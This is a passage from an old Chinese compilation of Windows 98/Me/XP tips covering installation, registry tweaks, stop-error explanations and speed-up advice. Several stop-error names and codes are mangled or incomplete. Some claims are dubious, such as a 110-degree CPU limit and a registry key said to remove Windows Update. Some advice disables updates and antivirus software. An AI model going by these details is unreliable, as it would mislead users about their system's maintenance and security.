7、接着系统会让你选择安装目录（默认为WINDOWS 98目录），然后是一些安装组件的对话框。其中便携式安装方式主要是用于手提电脑用户，而最小化安装则适合那些硬盘极为紧张的用户！推荐安装方式将安装最常用的系统组件，最合适初学安装操作系统的初学者。自定义安装方式，可由用户自行选择安装组件的内容、范围等，适合有一定经验的用户。一般来说选择“典型”安装方式，完全安装WINDOWS 98需要200M左右硬盘空间。
8、安装方式设定后，系统出现设定用户姓名与单位，按个人喜好进行输入即可。
9、点击下一步，系统弹出用户区域选择窗口，区域的选择主要是确定操作系统的系统时间与及日期，选择中国，点击下一步。
10、此时系统弹出提示窗口，询问用户是否创建启动盘，对于老鸟，直接点击“取消”继续安装，对于电脑初学者，建议创建一张启动盘，因为启动盘非常重要，它是发生某些问题时修复系统的启动文件必备工具。把软盘插入软驱，点击确定。
11、轻松时刻到来了，接下来系统进入文件复制阶段，整个过程都是自动化的安装方式，用户可以不用操心，就像系统提示的那样，可以煮一杯咖啡，坐在摇椅上，慢慢地端着品尝，并想像着安装完成后的喜悦！
12、文件复制完成后，系统弹出一个提示重新启动计算机的窗口，可以点击按钮，也可以等待15秒，让系统自动重新启动。
13、重新启动计算机之后，系统将自动进行各个项目的安装，不过还会弹出一个调整时区的窗口，由于之前选择的区域为中国，点击确定继续安装，其它事情无须插手，如果你的咖啡还没有喝完，那么请继续吧！
14、系统自动设置完毕之后，计算机将再次重新启动，系统也将自动进行最后的个人信息设置。
15、当系统又重新启动时，你就可以进入windows 98操作系统，同时看到微软给你的糖衣炮弹－“欢迎进入windows 98”界面。到此，整个windows 98安装大功告成！


Windows Me的安装

《一键清理系统垃圾》

Windows Me的安装

操作系统Windows Me的基本安装步骤如下：
1. 将Windows me的安装盘放入光驱，开始运行
2. 按Setup开始安装(你可以加上你的参数)
3. 它会要求你重新启动电脑，启动后，它会要求你打使用者名字，及公司名后，它再要求你再打上Product ID的．
4. 它会问你安装到何目录(多数是Windows)
5. 等待它问你用何模式去安装，多数用[自定].(用户请自行自定)
6．之后它会问你要不要开机片的，可按[取消]略过．
7. 耐心等待它复制文档，你会看到进度．
8. 之后，电脑会侦查你的系统及硬件的．你会看到进度．
9. 查看完成及重新启动电脑后便完成安装Windows．

一些安装资料
/im　略过记忆体检查。
/id　略过磁盘空间检查。
/is　略过定期的系统检查。
/iq　略过交互连结的文档。
/ie　执行安装程式而不执行「网络安装」模式。

Pentium Processor 166或更高版本
64MB RAM
600MB HardDisk

486m Class时：45-60min
Pentium Class时：20-30min
Pentium II Class时：15-20min
Pentium III Class时：10-18min


WINDOWS XP超酷秘籍11条大放送

《一键清理系统垃圾》

WINDOWS XP超酷秘籍11条大放送

   现在的东西更新得太快了，这不，Windows XP已经在悄悄占领它的阵地了，虽然Windows XP功能确实不错，不过对电脑的要求也高了些。不过，要想让Windows XP为你更好的服务，不但需要对它进行一些个性打造，还需要掌握它的使用技巧。怎么样，想成为Windows XP高手吗？那就继续往下看。

   1.改变Windows XP的登录背景图案：
   要长期面对一种登录图案，肯定会觉得十分单调，赶快跟我来，让我们一起来把它换成我们自己喜欢的图案。步骤如下：首先打开注册表编辑器，找到HKEY_USERS＼.DEFAULT＼Control Panel＼Desktop子键分支，双击Wallpaper，键入你所喜欢的图片路径，单击“确定”，然后找到Tilewallpaper，双击输入键值“1”，确定后再重新启动系统，效果是不是变了！赶快试试吧。

   2.改变登录时的背景色：
   修改完了Windows XP登录时的背景图案,还可以修改Windows XP登录时的背景颜色。首先,打开注册表编辑器，找到HKEY_USERS＼.DEFAULT＼Control Panel＼Colors子键分支，双击子键分支下的Background键值名，会出现“编辑字符串”对话框，在“数值数据”下的框中输入你想要的颜色键值，“确定”后，重新启动系统即可。(系统默认值是58 110 165，白色为255 255 255，红色为255 0 0，黑色为000)。

   3.“运行”的妙用：
   在“开始”菜单中的“运行”选项中输入“.”会打开C:＼Documents and Settings＼XXX(当前登录Windows XP的用户名)文件夹；在“运行”选项中输入“..”然后选择“确定”，电脑就会打开Windows XP所在的盘符下的Documents and Settings文件夹(如C:＼Documents and Settings)；如果输入“...”然后选择“确定”，就会打开“我的电脑”选项。

   4.加快启动速度：
   Windows XP虽然好使，但是启动时间还是有点长，接下来我们就让它进一步的缩短启动的时间。打开注册表，在注册表编辑器中找到HKEY_LOCAL_MACHINE＼SYSTEM＼CurrentControlSet＼Control＼Session Manager＼Memory Management＼PrefetchParameters子键分支，将右边EnablePrefetcher键值项的键值改为“1”，(它的默认值为“3”)重新启动电脑，是不是快了许多？

   5.加快关机速度：
   既然把Windows XP的启动速度提高了，它的关机速度当然也要缩短。打开注册表编辑器，找到HKEY_CURRENT_USER＼ControlPanel＼Desktop子键分支，把HunaAppTimeout键值项的键值改为“5000”，把WaittoKillappTimeout键值项的键值改为“4000”。接下来在注册表编辑器中找到HKEY_LOCAL_MACHINE＼SYSTEM＼CurrentControlSet＼Control＼，把WaitToKillServiceTimeout键值项的键值改为“4000”，确定之后重新启动系统同样可以加快Windows XP的关闭速度。

   6.快速打开文件夹：
   在“资源管理器”中，如果文件夹太多，为了方便地查看某个文件夹下的所有子目录，只需选中这个文件夹，然后再按小键盘上的“*”号键，电脑就会把这个文件夹下的所有子目录展开。例如你选择了“C盘”，再按键盘上的“*”键的话，电脑会把“C盘”下的所有文件全部打开。

   7.启动时恢复以前的桌面设置：
   又有别人在乱动我的电脑了，而且把我的桌面设置搞得乱七八糟。不过没关系幸好我有自己的独门秘诀，只要重新启动电脑后即会变成我原来的设置。想学的话就赶快来吧！首先打开注册表编辑器，找到HKEY_CURRENT_USERS＼Software＼Microsoft＼Windows＼CurrentVersion＼Polices＼Explorer子键分支，将“NoSaveSettings”键值项删除或是把它的键值改为“0”，确定后，重新启动系统。好了，以后别人再怎么改你的桌面设置，只要你重新启动电脑后就会回到你以前的设置。

   8.改变窗口弹出的速度：
   通过一些简单的修改你就可以改变窗口弹出的效果，不想试试吗？首先打开注册表编辑器，然后找到HKEY_CURRENT_USER＼Control Panel＼Desktop＼WindowMetrics子键分支，在右边的窗口中找到MinAniMate键值，其类型为REG_SZ，默认情况下此健值的值为1，表示打开窗口显示的动画，把它改为0，则禁止动画显示，接下来从开始菜单中选择“注销”命令，激活刚才所作的修改即可。

   9.禁止Windows XP的压缩功能：
   Windows XP自带了压缩功能，虽然比较方便，但功能比较单一。压缩时我们都会用一些比较专业的压缩软件，因此Windows XP自带的压缩功能对我们来说就没有什么用了。如果要取消它只需点击“开始”下的“运行”，在“运行”输入框中输入“regsvr32/u zipfldr.dll”，然后按回车键即可。

   10.设置个性的启动信息或警告信息：
   自己的电脑，当然要有自己个性的体现。下面就教你一招个性化的Windows XP启动。打开注册表编辑器，找到HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼Windows NT＼CurrentVersion＼Winlogon子键分支，双击LegalNoticeCaption健值，打开“编辑字符串”对话框，在“数值数据”下的文本框中输入自己想要的信息标题，如“哥们儿，你好！”，然后点击“确定”，重新启动系统即可。如果想要改变警告信息的话可以双击LegalNoticeText健值名称，在出现的“编辑字符串”窗口中输入想要显示的警告信息，单击“确定”按钮后，重新启动即可看到修改后的效果了。

   11.快速查看驱动器组件信息：
   右键点击“我的电脑”，在弹出的菜单中选择“管理”，然后依次打开“可移动存储”下的“库”，用右键点击所要查询的驱动器，在弹出的菜单中选择“属性”，然后点选“设备信息”，就可以方便的看到驱动器地信息了。


Windows XP注册表的应用

《一键清理系统垃圾》

Windows XP注册表的应用

1、加快窗口显示速度：我们可以通过修改注册表来改变窗口从任务栏弹出，以及最小化回归任务栏的动作，步骤如下：打开注册表编辑器，找到HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics子键分支，在右边的窗口中找到MinAniMate键值，其类型为REG_SZ，默认情况下此健值的值为1，表示打开窗口显示的动画，把它改为0，则禁止动画的显示，接下来从开始菜单中选择“注销”命令，激活刚才所作的修改即可。
2、去掉“更新”选项：对于大多数的用户来说，Windows XP的Windows Update功能似乎作用不大，我们可以去掉它，操作步骤如下：打开注册表编辑器，找到HKEY_CURRENT_USER\Software \Microsoft\Windows\CurrentVersion\Policies\Explorer子键分支，选择“编辑”菜单下的“新建”命令，新建一个类型为REG_DWORD的值，名称为NoCommonGroups，双击新建的NoCommonGroups子键，在“编辑字符串”文本框中输入键值“1”，然后单击“确定”按钮并重新启动系统即可。
3、修改Windows XP的登录背景图案：面对长久不变的单调的登录图案，你可能日久生厌，我们可以通过注册表来把它换成自己喜欢的图案，步骤如下：打开注册表编辑器，找到HKEY_USERS\.DEFAULT\Control Panel\Desktop子键分支，双击wallpaper，键入你选择好的图片的路径，如：c:\Documents and Settings\My Documents\My Pictures\mypic.bmp，点击“确定”，然后找到Tilewallpaper，双击它输入键值“1”，重新启动系统即可看到效果。
4、修改登录时的背景色：如果你还想修改登录时的背景颜色，可以按以下步骤操作：打开注册表编辑器，找到HKEY_USERS\.DEFAULT\Control Panel\Colors子键分支，双击子键分支下的Background键值名，出现“编辑字符串”对话框，在“数值数据”文本框中输入代表颜色的键值（比如黑色的RGB值为000，白色的RGB值为255 255 255，系统默认值是58 110 165），点击“确定”按钮，重新启动系统即可。
5、设置启动信息或增加警告信息：如果在启动Windows XP时，希望显示一些自己定义的个性化信息，可以按以下步骤来操作：打开注册表编辑器，找到HKEY_LOCAL_MACHINE_SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon子键分支，双击在它下面的LegalNoticeCaption健值名称，打开“编辑字符串”窗口，在“数值数据”文本框中输入信息对话框的标题，比如“你好，欢迎使用本机器”，然后双击LegalNoticeText，在随后出现的“编辑字符串”窗口中输入想要显示的警告信息，比如“请不要随意修改本级的设置，谢谢！”，单击“确定”按钮，重新启动即可看到修改后的效果了。
6、每次启动时保持桌面设置不变：我们可以通过修改注册表来保护我们的桌面设置，无论做了什么样的修改，只要重新启动之后桌面就会恢复原样。步骤如下：打开注册表编辑器，找到HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion\Polices\Explorer子键分支，在它的下面找到NoSaveSettings，其类型为REG_SZ，将其键值改为“0”，或者直接删除该键值项，重新启动系统使设置生效。
7、任意定制按钮颜色：尽管Windows XP本身带有多种窗口显示方案，但用户想定义某一个部位的颜色，比如把按钮的颜色由黑色改为蓝色或红色，这时就需要修改注册表了，步骤如下：打开注册表编辑器，找到HKEY_CURRENT_USER\Control Panel\Colors子键分支，双击在它下面的Bottontext，在打开的对话框中将其键值改为你想要颜色的值，比如红色25500，单击“确定”按钮，并重新启动系统即可看到效果了，此时按钮上的文字颜色将变成红色，此外你还可以修改按钮的宽度和高度及背景等参数。
8、禁止Dr.Watson的运行：Dr.Watson是自带的系统维护工具，它会在程序加载失败或崩溃时显示，我们可以通过注册表来取消它，步骤如下：打开注册表编辑器，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug子键分支，双击在它下面的Auto键值名称，将其“数值数据”改为0，最后按F5刷新使设置生效。


windows非法操作详解

《一键清理系统垃圾》

windows非法操作详解

   一般的"非法操作"有两个选项："关闭"和"详细资料"。可是"详细资料"里面的内容大多数人都看不明白，只好草草的关闭了。
1. 停止错误编号:0x0000000A
   说明文字RQL-NOT-LESS-OR-EQUAL
   通常的原因:驱动程序使用了不正确的内存地址。
   解决方法：
   如果无法登陆,则重新启动计算机。当出现可用的作系统列表时,按F8键。在Windows高级选项菜单屏幕上,选择"最后一次正确的配置",然后按回车键。检查是否正确安装了所有的新硬件或软件。如果这是一次全新安装,请与硬件或软件的制造商联系,获得可能需要的任何Windows更新或驱动程序。
   运行由计算机制造商提供的所有的系统诊断软件,尤其是内存检查。
   禁用或卸掉新近安装的硬件(RAM,适配器,硬盘,调制解调器等等),驱动程序或软件。
   确保硬件设备驱动程序和系统BIOS都是最新的版本。
   确保制造商可帮助你是否具有最新版本,也可帮助你获得这些硬件。
   禁用BIOS内存选项,例如cache或shadow。

2. 停止错误编号:0x0000001E
   说明文字:KMODE-EXPTION-NOT-HANDLED
   通常的原因:内核模式进程试图执行一个非法或未知的处理器指令。
   解决方法：
   确保有足够的空间,尤其是在执行一次新安装的时候。
   如果停止错误消息指出了某个特定的驱动程序,那么禁用他。如果无法启动计算机，应试着用安全模式启动,以便删除或禁用该驱动程序。
   如果有非Microsoft支持的视频驱动程序,尽量切换到标准的VGA驱动程序或Windows提供的适当驱动程序。
   禁用所有新近安装的驱动程序。
   确保有最新版本的系统BIOS。硬件制造商可帮助确定你是否具有最新版本,也可以帮助你获得他。
   BIOS内存选项,例如cache,shadow。

3. 停止错误编号:0x00000023或0x00000024
   说明文字:FAT-FILE-SYSTEM或MTFS-FILE-SYSTEM
   通常原因:问题出现在Ntfs.sys(允许系统读写NTFS驱动器的驱动程序文件)内。
   解决方法：运行由计算机制造商提供的系统诊断软件,尤其是硬件诊断软件。
   禁用或卸载所有的反病毒软件,磁盘碎片整理程序或备份程序。
   通过在命令提示符下运行Chkdsk/f命令检查硬盘驱动器是否损坏,然后重新启动计算机。

4. 停止编号:0x0000002E
   说明文字ATA-BUS-ERROR
   通常的原因:系统内存奇偶校验出错,通常由硬件问题导致。
   解决方法：卸掉所有新近安装的硬件(RAM、适配器、硬盘、调制解调器等等)。
   运行由计算机制造商提供的系统诊断软件,尤其是硬件诊断软件。
   确保硬件设备驱动程序和系统BIOS都是最新版本。
   使用硬件供应商提供的系统诊断,运行内存检查来查找故障或不匹配的内存。
   禁用BIOS内存选项,例如cache或shadow。
   在启动后出现可用作系统列表时,按F8。在Windows高级选项菜单屏幕上,选择"启动VGA模式"，然后按回车键。如果这样做还不能解决问题,可能需要更换不同的视频适配器列表,有关支持的视频适配器列表,请参阅硬件兼容性列表。

5. 停止编号:0x0000003F
   说明文字:NO-MOR-SYSTEM-PTES
   通常的原因:每次正确清理驱动程序。
   解决方法：禁用或卸载所有的反病毒软件，磁盘碎片处理程序或备份程序。

6. 停止错误编号:0x00000058
   说明文字:FTDISK-INTERN-ERROR
   通常的原因:容错集内的某个主驱动器发生故障。
   解决方法：
   使用Windows安装盘启动计算机,从镜象(第2)系统驱动器引导。有关如何编辑Boot.ini文件以指向镜象系统驱动器的指导,可在MIcrosoft支持服务Web站点搜索"EditARC path"。

7. 停止错误编号:0x0000007B
   说明文字NACCESSI-BLE-BOOT-DEVICE
   通常原因:初始化I/O系统(通常是指引导设备或文件系统)失败。
   解决方法：
   引导扇区病毒通常会导致这种停止错误，是用反病毒软件的最新版本,检查计算机上是否有存在病毒。如果找到病毒,则必须执行必要的方法把他从计算机上清除掉,请参阅反病毒软件文档了解如何执行这些步骤。
   卸下所有新近安装的硬件(RAM、适配器、调制解调器等等)。
   核对MIcrosoft硬件兼容性列表以确保所有的硬件和驱动程序都与Windows兼容。
   如果使用的是SCSI适配器,可以从硬件供应商除获得最新WINDOWS驱动程序,禁用SCSI设备的同步协商,检查该SCSI链是否终结,并核对这些设备的SCSIID,如果无法确定如何执行这些步骤,可参考硬件设备的文档。
   如果你用的是IDE设备,将板上的IDE端口定义为唯一的主端口，核对IDE设备的主/从/唯一设置，卸掉除硬盘之外的所有IDE设备。如果无法确认如何执行这些，可参考硬件文档。
   如果计算机已使用NTFS文件系统格式化,可重新启动计算机,然后在该系统分区上运行Chkdsk/f/r命令。如果由于错误而无法启动系统,那么使用命令控制台,并运行Chkdsk /r命令。
   运行Chkdsk/f命令以确定文件系统是否损坏。如果Windows不能运行Chkdsk命令,将驱动器移动到其他运行Windows的计算机上,然后从这台计算机上对该驱动器运行Chkdsk命令。

8. 停止错误编号:0x0000007F
   说明文字:UNEXPECTED-KERNEL-MODE-TRAP
   通常的原因:通常是由于硬件或软件问题导致,但一般都由硬件故障引起的。.
   解决方法：
   核对Microsoft硬件兼容性列表以确保所有的硬件和驱动程序都与Windows兼容，如果计算机主板不兼容就会产生这个问题。
   卸掉所由新近安装的硬件。
   运行由计算机制造商提供的所有系统诊断软件,尤其是内存检查。
   禁用BIOS内存选项,例如cache或shadow。

9. 停止错误编号:0x00000050
   说明文字AGE-FAULT-IN-NONPAGED-AREA
   通常的原因:内存错误(数据不能使用分页文件交换到磁盘中)
   解决方法：
   卸掉所有的新近安装的硬件。
   运行由计算机制造商提供的所有系统诊断软件，尤其是内存检查。
   检查是否正确安装了所有新硬件或软件,如果这是一次全新安装,请与硬件或软件制造商联系,获得可能需要的任何Windows更新或驱动程序。
   禁用或卸载所有的反病毒程序。
   禁用BIOS内存选项,例如cache或shadow。

10.停止错误编号:0x0000007
   说明文字：KERNEL-STEL-STACK-INPAGE-ERROR
   通常的原因：无法从分页文件将内核数据所需的页面读取到内存中。
   解决方法：
   使用反病毒软件的最新版本，检查计算机上是否有病毒。如果找到病毒，则执行必要的步骤把他从计算机上清除掉。请参阅制造商提供的所有系统诊断软件，尤其是内存检查。
   禁用BIOS内存选项，例如cache,shadow。

11.停止错误编号：0x00000079
   说明文字：MISMATCHED-HAL
   通常的原因：硬件抽象层与内核或机器类型不匹配（通常发生在单处理器和多处理器配置文件混合在同一系统的情况下）。
   解决方法：
   要解决本错误，可使用命令控制台替换计算机上错误的系统文件。
   单处理器系统的内核文件是Ntoskml.exe，而多处理器系统的内核文件是Ntkrnlmp.exe，但是，这些文件要与安装媒体上的文件相对应；在安装完Windows2000后，不论使用的是哪个原文件，都会被重命名为Ntoskrnl.exe文件。HAL文件在安装之后也使用名称Hal.dll，但是在安装媒体上却有若干个可能的HAL文件。

12.停止错误编号：0x0000007A
   说明文字：KERNEL-DATA-INPAGE-ERROR
   通常的原因：无法从分页文件将内核数据所需的页面读取到内存中。（通常是由于分页文件上的故障，病毒，磁盘控制器错误或由故障的RAM引起的）。
   解决方法：
   使用反病毒软件的最新版本，检查计算机上是否存在病毒。如果找到病毒。则执行必要的步骤把他从计算机上清除掉，请参阅反病毒软件文档了解如何执行这些步骤。
   如果计算机已使用NTFS文件系统格式化。可重新启动计算机，然后在该系统分区上运行Chkdsk/f/r命令。如果由于错误而无法启动命令，那么使用命令控制台，并运行Chkdsk /r命令。

13.停止错误编号：0xC000021A
   说明文字：STATUS-SYSTEM-PROCESS-TERMINATED
   通常的原因：用户模式子系统，例如Winlogon或客户服务器运行时子系统（CSRSS）已被损坏，所以无法再保证安全性。
   解决方法：
   卸掉所有新近安装的硬件。
   如果无法登陆，则重新启动计算机。当出现可用的作系统列表时按F8。在Windows2000高级选项菜单屏幕上，选择："最后一次正确的配置"。然后按回车。
   运行故障恢复台，并允许系统修复任何检测到的错误。

14.停止错误编号：0xC0000221
   说明文字：STATUS-IMAGE-CHECKISU7M-MISMATCH
   通常的原因：驱动程序或系统DLL已经被损坏。
   解决方法：
   运行故障复控台，并且允许系统修复任何检测到的错误。
   如果在RAM添加到计算机之后，立即发生错误，那么可能是分页文件损坏，或者新RAM由故障或不兼容。删除Pagefile.sys并将系统返回到原来的RAM配置。


Windows变慢原因分析及解决方法

《一键清理系统垃圾》

Windows变慢原因分析及解决方法

    谁都希望计算机一开机就可以立即进入Windows 系统而不用等待，或者是系统在使用的时候不会越来越慢，但由于种种原因常常使这些愿望不能实现，甚至一开机就死机或者用着用着就越来越慢的情况也经常发生。其实有些时候Windows 启动速度缓慢并不是它本身的问题，而是一些设备或软件造成的。
    本文就是通过软件、硬件和病毒三大方面来分析系统速度变慢的原因，并且提供了针对系统的加速技巧。
第一部份系统变慢
一、软件篇
1、设定虚拟内存
   硬盘中有一个很宠大的数据交换文件，它是系统预留给虚拟内存作暂存的地方，很多应用程序都经常会使用到，所以系统需要经常对主存储器作大量的数据存取，因此存取这个档案的速度便构成影响计算机快慢的非常重要因素！一般Windows预设的是由系统自行管理虚拟内存，它会因应不同程序所需而自动调校交换档的大小，但这样的变大缩小会给系统带来额外的负担，令系统运作变慢！有见及此，用户最好自定虚拟内存的最小值和最大值，避免经常变换大小。要设定虚拟内存，在“我的电脑”上按右键选择“属性”，在“高级”选项里的“效能”的对话框中，对“虚拟内存”进行设置。
2、彻底删除程序
   大家都知道，如果想删除某些程序，可到“添加/删除程序”中进行操作，但大家又知不知道，它只会帮你删除程序，而不会帮你删除该程序的注册码和一些登录项目呢？要彻底删除程序，要找回些“专业”软件来删除！symantec公司出品的nortonuninstall，因为有某部份破坏了某些删除软件的版权，故此全世界已停止出售，正因如此，symantec才出了cleansweep，不过论功能上，还是nortonuninstall更胜一寿！言归正传，其实除了这两个软件外，还有很多同类软件都能有效地删除程序。
3、检查应用软件或者驱动程序
   有些程序在电脑系统启动会时使系统变慢。如果要是否是这方面的原因，我们可以从“安全模式”启动。因为这是原始启动，“安全模式”运行的要比正常运行时要慢。但是，如果你用“安全模式”启动发现电脑启动速度比正常启动时速度要快，那可能某个程序是导致系统启动速度变慢的原因。
4、桌面图标太多会惹祸
   桌面上有太多图标也会降低系统启动速度。Windows每次启动并显示桌面时，都需要逐个查找桌面快捷方式的图标并加载它们，图标越多，所花费的时间当然就越多。同时有些杀毒软件提供了系统启动扫描功能，这将会耗费非常多的时间，其实如果你已经打开了杀毒软件的实时监视功能，那么启动时扫描系统就显得有些多余，还是将这项功能禁止吧！ 建议大家将不常用的桌面图标放到一个专门的文件夹中或者干脆删除！
5、ADSL导致的系统启动变慢
   默认情况下Windows XP在启动时会对网卡等网络设备进行自检，如果发现网卡的IP地址等未配置好就会对其进行设置，这可能是导致系统启动变慢的真正原因。这时我们可以打开“本地连接”属性菜单，双击“常规”项中的“Internet协议”打开“TCP/IP属性”菜单。将网卡的IP地址配置为一个在公网（默认的网关是192.168.1.1）中尚未使用的数值如192.168.1.X，X取介于2~255之间的值，子网掩码设置为255.255.255.0，默认网关和DNS可取默认设置。
6、字体对速度的影响
   虽然微软声称Windows操作系统可以安装1000～1500种字体，但实际上当你安装的字体超过500 种时，就会出现问题，比如：字体从应用程序的字体列表中消失以及Windows的启动速度大幅下降。在此建议最好将用不到或者不常用的字体删除，为避免删除后发生意外，可先进行必要的备份。
7、删除随机启动程序
   何谓随机启动程序呢？随机启动程序就是在开机时加载的程序。随机启动程序不但拖慢开机时的速度，而且更快地消耗计算机资源以及内存，一般来说，如果想删除随机启动程序，可去“启动”清单中删除，但如果想详细些，例如是QQ、popkiller 之类的软件，是不能在“启动”清单中删除的，要去“附属应用程序”，然后去“系统工具”，再去“系统信息”，进去后，按上方工具列的“工具”，再按“系统组态编辑程序”，进去后，在“启动”的对话框中，就会详细列出在启动电脑时加载的随机启动程序了！XP系统你也可以在“运行”是输入Msconfig调用“系统配置实用程序”才终止系统随机启动程序，2000系统需要从XP中复制msconfig程序。
8、取消背景和关闭activedesktop
   不知大家有否留意到，我们平时一直摆放在桌面上漂亮的背景，其实是很浪费计算机资源的！不但如此，而且还拖慢计算机在执行应用程序时的速度！本想美化桌面，但又拖慢计算机的速度，这样我们就需要不在使用背景了，方法是：在桌面上按鼠标右键，再按内容，然后在“背景”的对话框中，选“无”，在“外观”的对话框中，在桌面预设的青绿色，改为黑色......至于关闭activedesktop，即是叫你关闭从桌面上的web画面，例如在桌面上按鼠标右键，再按内容，然后在“背景”的对话框中，有一幅背景，名为Windows XX，那副就是web画面了！所以如何系统配置不高就不要开启。
9、金山毒霸升级也可造成系统变慢
   如果你升级了金山毒霸后发现系统速度变慢，PU占用率一直很高，那么这个问题可能就是毒霸升级文件惹的祸，如果有朋友也在升级之后发生该状况，请进行以下处理：首先进入毒霸的安装目录，找到KAExtend.DAT这个文件，然后把它删除，接着点击毒霸“工具/在线升级”，在线更新KAExtend.DAT这个文件，最后重启电脑即可解决此问题。
10、把Windows变得更苗条
   与DOS系统相比，Windows过于庞大，而且随着你每天的操作，安装新软件、加载运行库、添加新游戏等等使得它变得更加庞大，而更为重要的是变大的不仅仅是它的目录，还有它的注册表和运行库。因为即使删除了某个程序，可是它使用的DLL文件仍然会存在，因而随着使用日久，Windows的启动和退出时需要加载的DLL动态链接库文件越来越大，自然系统运行速度也就越来越慢了。这时我们就需要使用一些彻底删除DLL的程序，它们可以使Windows恢复苗条的身材。建议极品玩家们最好每隔两个月就重新安装一遍Windows，这很有效。
11、更改系统开机时间
   虽然你已知道了如何新增和删除一些随机启动程序，但你又知不知道，在开机至到进入Windows的那段时间，计算机在做着什么呢？又或者是，执行着什么程序呢？那些程序，必定要全部载完才开始进入Windows，你有否想过，如果可删除一些不必要的开机时的程序，开机时的速度会否加快呢？答案是会的！想要修改，可按"开始"，选"执行"，然后键入win.ini，开启后，可以把以下各段落的内容删除，是删内容，千万不要连标题也删除！它们包括：[compatibility]、[compatibility32]、[imecompatibility]、[compatibility95]、[modulecompatibility]和[embedding]。
--------------------------------------------------------------------------------
作者: saii　　时间: 2005-1-25 02:41　　 标题: Windows变慢原因分析及解决方法

[这个贴子最后由saii在 2005/01/24 02:37pm 第 1 次编辑]

二、硬件篇
1、Windows系统自行关闭硬盘DMA模式
    硬盘的DMA模式大家应该都知道吧，硬盘的PATA模式有DMA33、DMA66、DMA100和DMA133，最新的SATA-150都出来了！一般来说现在大多数人用的还是PATA模式的硬盘，硬盘使用DMA模式相比以前的PIO模式传输的速度要快2~8倍。DMA模式的起用对系统的性能起到了实质的作用。但是你知道吗？Windows 2000、XP、2003系统有时会自行关闭硬盘的DMA模式，自动改用PIO模式运行！这就造成在使用以上系统中硬盘性能突然下降，其中最明显的现象有：系统起动速度明显变慢，一般来说正常Windows XP系统启动时那个由左向右运动的滑条最多走2～4次系统就能启动，但这一问题发生时可能会走5～8次或更多！而且在运行系统时进行硬盘操作时明显感觉变慢，在运行一些大的软件时CPU占用率时常达到100%而产生停顿，玩一些大型3D游戏时画面时有明显停顿，出现以上问题时大家最好看看自己硬盘的DMA模式是不是被Windows 系统自行关闭了。查看自己的系统是否打开DMA模式：
    a. 双击“管理工具”，然后双击“计算机管理”；
    b. 单击“系统工具”，然后单击“设备管理器”；
    c. 展开“IDE ATA/ATAPI 控制器”节点；
    d. 双击您的“主要IDE控制器”；
    e. 点击“高级设置”。
    看到“设备0”，下面的传输模式应设为“DMA（若可用）”，再下面“当前传输模式”，如果是“Ultra DMA Mode *（*为数字，DMA33为2，DMA66为4，DMA100为5、DMA133为6）”，那么你的系统正常，但如果以前你自己设的是“Ultra DMA Mode 6”又没有改动，而现在是“Ultra DMA Mode 4”或“Ultra DMA Mode 2”更或者是“PIO 模式”而且改不过来！可能就是系统自行关闭了DMA模式了。
2、CPU 和风扇是否正常运转并足够制冷
    当CPU风扇转速变慢时，CPU本身的温度就会升高，为了保护CPU的安全，CPU就会自动降低运行频率，从而导致计算机运行速度变慢。有两个方法检测CPU的温度。你可以用“手指测法”用手指试一下处理器的温度是否烫手，但是要注意的是采用这种方法必须先拔掉电源插头，然后接一根接地线来防止身上带的静电击穿CPU以至损坏。另一个比较科学的方法是用带感温器的万用表来检测处理器的温度。
    因为处理器的种类和型号不同，合理温度也各不相同。但是总的来说，温度应该低于 110 度。如果你发现处理器的测试高于这处温度，检查一下机箱内的风扇是否正常运转。
3、USB和扫描仪造成的影响
    由于Windows 启动时会对各个驱动器（包括光驱）进行检测，因此如果光驱中放置了光盘，也会延长电脑的启动时间。所以如果电脑安装了扫描仪等设备，或在启动时已经连接了USB硬盘，那么不妨试试先将它们断开，看看启动速度是不是有变化。一般来说，由于USB接口速度较慢，因此相应设备会对电脑启动速度有较明显的影响，应该尽量在启动后再连接USB设备。如果没有USB设备，那么建议直接在BIOS设置中将USB功能关闭。
4、是否使用了磁盘压缩
    因为“磁盘压缩”可能会使电脑性能急剧下降，造成系统速度的变慢。所以这时你应该检测一下是否使用了“磁盘压缩”，具体操作是在“我的电脑”上点击鼠标右键，从弹出的菜单选择“属性”选项，来检查驱动器的属性。
5、网卡造成的影响
    只要设置不当，网卡也会明显影响系统启动速度，你的电脑如果连接在局域网内，安装好网卡驱动程序后，默认情况下系统会自动通过DHCP来获得IP地址，但大多数公司的局域网并没有DHCP服务器，因此如果用户设置成“自动获得IP地址”，系统在启动时就会不断在网络中搜索DHCP 服务器，直到获得IP 地址或超时，自然就影响了启动时间，因此局域网用户最好为自己的电脑指定固定IP地址。
6、文件夹和打印机共享
    安装了Windows XP专业版的电脑也会出现启动非常慢的时候，有些时候系统似乎给人死机的感觉，登录系统后，桌面也不出现，电脑就像停止反应，1分钟后才能正常使用。这是由于使用了Bootvis.exe 程序后，其中的Mrxsmb.dll文件为电脑启动添加了67秒的时间！
    要解决这个问题，只要停止共享文件夹和打印机即可：选择“开始→设置→网络和拨号连接”，右击“本地连接”，选择“属性”，在打开的窗口中取消“此连接使用下列选定的组件”下的“Microsoft网络的文件和打印机共享”前的复选框，重启电脑即可。
7、系统配件配置不当
    一些用户在组装机器时往往忽略一些小东西，从而造成计算机整体配件搭配不当，存在着速度上的瓶颈。比如有些朋友选的CPU档次很高，可声卡等却买了普通的便宜货，其实这样做往往是得不偿失。因为这样一来计算机在运行游戏、播放影碟时由于声卡占用CPU资源较高且其数据传输速度较慢，或者其根本无硬件解码而需要采用软件解码方式，常常会引起声音的停顿，甚至导致程序的运行断断续续。又如有些朋友的机器是升了级的，过去老机器上的一些部件如内存条舍不得抛弃，装在新机器上照用，可是由于老内存的速度限制，往往使新机器必须降低速度来迁就它，从而降低了整机的性能，极大地影响了整体的运行速度。
8、硬件驱动
    许多玩家是新手，他们对于硬件的驱动不甚了解，装Windows时不知道安装驱动程序，如此一来就像茶壶里煮饺子，有嘴倒不出，没能发挥硬件的性能，极大地浪费了资源。我们大家知道，相同的硬件搭配不同版本的驱动程序或者是不同厂家的驱动程序常常都会造成性能上的差异极大，更何况是没有安装驱动程序呢。以播放影碟为例，即使你是最先进的TNT显卡，如果未安装驱动程序，那么在播放影碟时它不会采用任何显示卡的加速功能，而改用软件来模拟加速，其效果自然是惨不忍睹了。
9、断开不用的网络驱动器
